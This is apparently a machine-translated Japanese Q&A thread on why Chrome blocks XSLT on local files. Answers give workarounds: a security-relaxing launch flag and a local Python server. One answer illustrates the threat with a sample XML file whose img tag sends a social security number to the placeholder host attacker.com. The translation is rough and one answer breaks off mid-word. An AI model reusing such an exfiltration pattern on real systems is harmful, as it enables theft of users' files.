Chromeでローカルファイルに対してXSL変換を実行することはできますか？

私はxsltを調べていて、w3schoolsの例でテストを開始しました。

ただし、xmlとxslをファイルに保存してローカルで開こうとすると、chromeはxsl変換を実行しません。空白のページが表示されるだけです。

<?xml-stylesheet type="text/xsl" href="style.xsl">タグをxmlドキュメントに追加しましたが、Firefoxはそれを想定どおりにレンダリングします。また、Webサーバーを介してファイルを見ると、chromeはファイルを想定どおりに表示します。

リンクがローカルの場合、Chromeでスタイルシート情報を見つけるのに問題がありますか？hrefをに変更しfile:///C:/xsl/style.xslても違いはありませんでした。

更新：これは、file：/// *を同一生成元として扱わないというセキュリティポリシーの副作用のようです。これにより、コンソールに次のエラーが表示されます。

URL file：/// C：/xsl-rpg/style.xslをURL file：/// C：/xsl-rpg/data.xmlのフレームからロードしようとすると安全ではありません。ドメイン、プロトコル、およびポートは一致する必要があります。

簡単な答えは「いいえ、そこにあるさまざまなブラウザのセットの1つを使用してください」です。

これが機能しない理由は、XMLファイルが同じディレクトリ内のローカルXSLTファイルにアクセスするのをブロックすることにより、Chromeが物議を醸す方法で対処したセキュリティ上の懸念によるものです^{[1] [2] [3] [4]}、HTMLファイルは同じディレクトリ内の.CSSファイルに問題なくアクセスできます。

上記の問題全体で、ユーザーはより明確なエラーメッセージ（ドメイン、プロトコル、ポートが実際に一致するため）、または少なくともスタイルなしでXMLを表示することを求めています。Chrome開発者はこれらのリクエストを無視しています。

これは、Chromeのコマンドラインフラグを使用してローカルで実行できます。

特定のフラグは --allow-file-access-from-files

OS Xの場合：Terminal.appから実行 /Applications/Google\ Chrome.app/contents/MacOS/Google\ Chrome --allow-file-access-from-files

Windowsの場合：コマンドプロンプトから実行 %LOCALAPPDATA%\Google\Chrome\Application\chrome.exe --allow-file-access-from-files

注：Chromeが現在実行されている場合は、Chromeを終了する必要があります。それ以外の場合は、Ch

OPに固執したい場合、答えは「いいえ」です（他の人が指摘しているように）が、問題を解決する1つの方法は、単純なWebサーバーを実行し、http経由でChromeでファイルを開くことです。Python 2.xがインストールされている場合は、次のように入力してWebサーバーを実行できます。

python -m SimpleHTTPServer

またはPython3.xの場合：

python3 -m http.server

次にhttp://localhost:8000/yourfile.xml、Chromeでファイルを開きます。うまくいけば、あなたはあなたの仕事を終わらせたいだけであり、それを使ってファイルを開かなければならないことは重要なことではありませんfile://

Chromeのバグページを解読するのに少し時間がかかりました。彼らは問題が何であるか、そしてなぜ全員を壊さないのではなく全員を壊すことを選んだのかを説明しないことに非常に熱心です。

ハードドライブにXMLファイル（どこかに）があると仮定します。例：

C：\ Users \ Ian \ Documents \ Taxes \ StudioTaxReturn_2015.xml

そして、悪意のあるエンティティ（どういうわけか）が悪意のあるXmlファイルを私のコンピューターにドロップすることに成功しました。

C：\ Users \ Ian \ AppData \ LocalLow \ Temp \ TrojanVirusWorm.xml

TrojanVirusWorm.xmlにスタイルシート処理命令（PI）が含まれていると想像してください。

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<?xml-stylesheet type="text/xsl" href="file://C:/Users/Ian/Documents/Taxes/StudioTaxReturn_2015.xml""?>

次に、攻撃者は、ローカルに保存されたtrojanVirusWorm.xmlファイルに移動するようにブラウザに指示します。

どうやら、XMLファイルが（XSDファイルによって変換されるのではなく）XSDファイルの内容を読み取ることができる方法があります：

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<?xml-stylesheet type="text/xsl" href="file://C:/Users/Ian/Documents/Taxes/StudioTaxReturn_2015.xml""?>
   <!--And then a miracle happens, and this XML file is able to read
       the contents of the stylesheet xml file-->
<html>
   <img src="http://attacker.com/UploadSocialSecurityNumber&ssn=..."></img>
</html>

XMLファイルがスタイルシートファイルを読み取る方法がわかりません。しかし、Chromeチームは、それが危険であり、解決できないことを保証しています。

他のすべてのブラウザがそれを解決しました。それは問題ではないので、彼らはそれを解決しました。

xslファイルに従ってxmlを表示するための回避策

ヘッダー付きのsome_file.xmlがあるとします。

<?xml version="1.0" encoding="UTF-8" ?>
<?xml-stylesheet type="text/xsl" href="https://some-site.com/Common.xsl"?>

1. ファイルをダウンロードしhttps://some-site.com/Common.xslて、some_file.xml
2. ヘッダーの一部をからhref="https://some-site.com/Common.xsl"に変更します href="http://localhost:8001/Common.xsl"
3. ファイルのあるディレクトリで実行します- python3 -m http.server 8001
4. 任意のブラウザで開く http://localhost:8001/some_file.xml

ブラウザの設定を変更することで、ChromeがXSLファイルをレンダリングできるようにすることができます。より安全なアプローチは、Visual Studio Code LiveServerやApacheなどのローカルWebサーバーを介してアクセスすることです。手順については、「XSLTがローカルファイルでレンダリングしない」を参照してください。